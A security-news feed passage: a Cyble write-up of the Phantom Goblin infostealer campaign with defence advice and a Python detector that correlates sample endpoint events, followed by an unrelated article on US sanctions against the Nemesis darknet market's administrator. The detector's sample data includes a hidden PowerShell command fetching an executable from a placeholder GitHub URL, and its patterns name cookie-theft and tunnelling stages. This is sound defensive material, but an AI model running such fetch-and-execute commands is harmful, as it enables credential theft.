    Malicious LNK File (Source: Cyble)

    The infection process begins with the delivery of an email containing a RAR attachment, which houses the malicious LNK file. Upon execution, the LNK file triggers the PowerShell script that downloads and runs additional payloads. Among these payloads are:

    • Updater.exe: This component focuses on stealing cookies from popular browsers like Chrome, Edge, and Brave. It achieves this by terminating the browser processes and enabling remote debugging to bypass security measures like App Bound Encryption (ABE). Once the cookies are extracted, they are archived and sent to the attacker’s Telegram bot.
    • Vscode.exe: This binary is responsible for establishing a VSCode tunnel, allowing the attackers to remotely access the infected system. The malware manipulates VSCode’s legitimate update process to maintain its cover, ensuring that it can establish a hidden backdoor into the victim’s machine.
    • Browser.exe: This payload gathers a variety of sensitive information, including browsing history, login credentials, and session data. By targeting a wide range of browsers, it ensures that a broad swath of personal data is collected from the victim’s system.

    Defense Against Phantom Goblin

    To protect systems from Phantom Goblin and similar threats, experts recommend several best practices:

    • Email Filtering: Implement advanced filtering techniques to block suspicious attachments, particularly those in RAR, ZIP, or LNK formats. Scanning all attachments with up-to-date antivirus software before opening them is crucial.
    • Disabling VSCode Tunnels: Restrict the use of Visual Studio Code tunneling for unauthorized users by enforcing access controls and authentication mechanisms. Limiting the ability to run VSCode on sensitive systems can help prevent remote access.
    • PowerShell Restrictions: Disable or restrict the use of PowerShell and script execution on systems unless absolutely necessary. Monitoring for suspicious PowerShell activity, such as the execution of scripts from external repositories, can help detect and block malicious actions.
    • Browser Security: Implement strong browser security measures to prevent unauthorized debugging and to restrict access to sensitive data stored within browsers. Enforcing multi-factor authentication (MFA) and session timeouts can help further protect browser-based credentials.
    • Endpoint Protection: Deploy endpoint protection solutions that include real-time threat detection for malicious processes, registry changes, and unusual file downloads.
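    As an added illustration of the monitoring these recommendations call for (example code written here, not code from Cyble or the report), the following Python correlates constructed endpoint events against the stages of the infection chain described above: PowerShell fetching payloads from GitHub, a registry Run-key entry, a browser started with remote debugging, a VSCode tunnel, and traffic to the Telegram bot API. The host names, the event format and the GitHub path are constructed placeholders.

```python
import re
from collections import defaultdict

# Constructed sample events as (host, source, detail); not real telemetry.
SAMPLE_EVENTS = [
    ("ws01", "process", "explorer.exe -> powershell.exe -w hidden -c iwr https://github.com/EXAMPLE-ORG/EXAMPLE-REPO/raw/main/updater.exe"),
    ("ws01", "registry", r"set HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater"),
    ("ws01", "process", "updater.exe -> chrome.exe --remote-debugging-port=9222"),
    ("ws01", "process", "powershell.exe -> vscode.exe tunnel"),
    ("ws01", "network", "browser.exe -> api.telegram.org:443"),
    ("ws02", "process", "devenv.exe -> powershell.exe -File build.ps1"),   # benign build script
    ("ws02", "network", "Telegram.exe -> api.telegram.org:443"),           # real Telegram client
]

# One pattern per stage of the chain the report describes.
STAGES = {
    "powershell_github_download": re.compile(
        r"powershell\.exe.*(iwr|Invoke-WebRequest|DownloadString|curl).*github\.com", re.I),
    "run_key_persistence": re.compile(r"CurrentVersion\\Run\\", re.I),
    "browser_remote_debugging": re.compile(
        r"(chrome|msedge|brave)\.exe.*--remote-debugging-port", re.I),
    "vscode_tunnel": re.compile(r"(vscode|code)\.exe\s+tunnel\b", re.I),
    # The report names the payloads that talk to the bot API; a genuine client does not match.
    "telegram_bot_channel": re.compile(
        r"(updater|browser|vscode)\.exe -> api\.telegram\.org", re.I),
}


def stages_per_host(events):
    """Map each host to the sorted set of chain stages observed on it."""
    hits = defaultdict(set)
    for host, _source, detail in events:
        for stage, pattern in STAGES.items():
            if pattern.search(detail):
                hits[host].add(stage)
    return {host: sorted(stages) for host, stages in hits.items()}


def hosts_to_alert(events, min_stages=3):
    """A single stage is noise (build scripts, a real Telegram client);
    several distinct stages on one host match the chain and warrant triage."""
    return sorted(host for host, stages in stages_per_host(events).items()
                  if len(stages) >= min_stages)


if __name__ == "__main__":
    for host, stages in stages_per_host(SAMPLE_EVENTS).items():
        print(host, stages)
    print("alert:", hosts_to_alert(SAMPLE_EVENTS))
```

    Feed real process, registry and network events into the same tuple shape to reuse the correlation; raising `min_stages` trades recall for fewer false positives.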
    Conclusion

    Phantom Goblin highlights how cybercriminals use social engineering and trusted tools to bypass security measures and steal sensitive data. By exploiting vulnerabilities in browsers and developer tools, and leveraging remote access through Visual Studio Code tunnels, the attackers remain undetected and persistent. Cyble’s cutting-edge products and solutions, including Cyble Vision and Cyble Hawk, provide AI-driven threat intelligence and proactive security measures to help organizations detect, prevent, and respond to cyber threats, ensuring better defense against attacks like Phantom Goblin.

  • U.S. Treasury Sanctions Iranian Darknet Admin Behind Nemesis Marketplace
    by Samiksha Jain on March 5, 2025 at 6:50 am

    The U.S. Department of the Treasury has imposed sanctions on Iranian national Behrouz Parsarad, the sole administrator of Nemesis, a darknet marketplace that facilitated the sale of illegal drugs, hacking services, and false identification documents. This action follows the marketplace’s takedown in a global law enforcement operation in 2024.

    A Darknet Marketplace for Crime

    Nemesis, founded in 2021, was a criminal enterprise with over 30,000 active users and 1,000 vendors. According to U.S. officials, the marketplace facilitated transactions worth nearly $30 million, including fentanyl sales in the United States and abroad. Designed with built-in money laundering features, the marketplace provided a safe haven for cybercriminals and drug traffickers. “As the administrator of the Nemesis darknet marketplace, Parsarad sought to build—and continues to try to re-establish—a safe haven to facilitate the production, sale, and shipment of illegal narcotics like fentanyl and other synthetic opioids,” stated Acting Under Secretary for Terrorism and Financial Intelligence Bradley T. Smith. “Treasury, in partnership with U.S. law enforcement, will use all available tools to dismantle these darknet marketplaces and hold accountable the individuals who oversee them.” Nemesis allowed criminals to sell fentanyl, often laced with other substances, and provided professional hacking services that enabled buyers to take control of victims’ online accounts. The marketplace’s encrypted nature allowed users to operate anonymously, making it a major player in global cybercrime.

    International Crackdown and Sanctions

    In March 2024, U.S., German, and Lithuanian law enforcement agencies coordinated a joint operation to seize Nemesis’ servers, effectively shutting down the marketplace. However, authorities report that Parsarad has been actively trying to rebuild a similar platform and has been in contact with former vendors. OFAC’s action marks its first designation as a member of the FBI-led Joint Criminal Opioid and Darknet Enforcement (JCODE) Team. The designation was made under Executive Order (E.O.) 14059, which targets individuals and entities contributing to the proliferation of narcotics. OFAC’s move aligns with previous actions against other illicit marketplaces, including the shutdown of Genesis Market in 2023 and Hydra Market in 2022.

    Financial Networks Under Scrutiny

    In addition to sanctioning Parsarad, OFAC has identified 49 virtual currency addresses linked to his financial activities. These addresses were allegedly used to launder funds for narcotics traffickers and cybercriminals, generating millions of dollars in illicit revenue. Treasury officials emphasized that darknet marketplaces are crucial to the global drug trade. A recent Financial Crimes Enforcement Network (FinCEN) advisory, published on June 20, 2024, highlighted how criminal organizations use these platforms to distribute precursor chemicals and synthetic opioids, worsening the fentanyl crisis in the United States.

    Nemesis Marketplace: Implications of the Sanctions

    The sanctions against Parsarad have significant consequences. All property and interests linked to him within the United States or under U.S. control are now blocked. Additionally, entities that are at least 50% owned by Parsarad are also subject to these restrictions. Financial institutions and individuals engaging with the sanctioned individual or his entities may face severe penalties. Under U.S. law, transactions involving designated persons are generally prohibited unless authorized by OFAC. This includes providing financial assistance, goods, or services to Parsarad or entities under his control. Violations of these sanctions could lead to civil or criminal penalties, with OFAC emphasizing strict enforcement. The Treasury Department warned that non-U.S. individuals and businesses must also comply with these restrictions to avoid potential repercussions.

    A Step Forward in Stopping Darknet Crime

    The action against Parsarad and Nemesis follows a broader effort to stop cyber-enabled crime and narcotics trafficking worldwide. By targeting the financial infrastructure behind these illicit platforms, law enforcement agencies aim to curb the reach of cybercriminals and drug traffickers. While Parsarad may attempt to rebuild, authorities have signaled their resolve to track and dismantle such operations. With darknet marketplaces playing a critical role in global cybercrime, Treasury officials stress that coordinated international action remains essential. As the fight against online crime continues, the sanctions against Parsarad mark another significant step in securing the digital landscape from illicit activities.
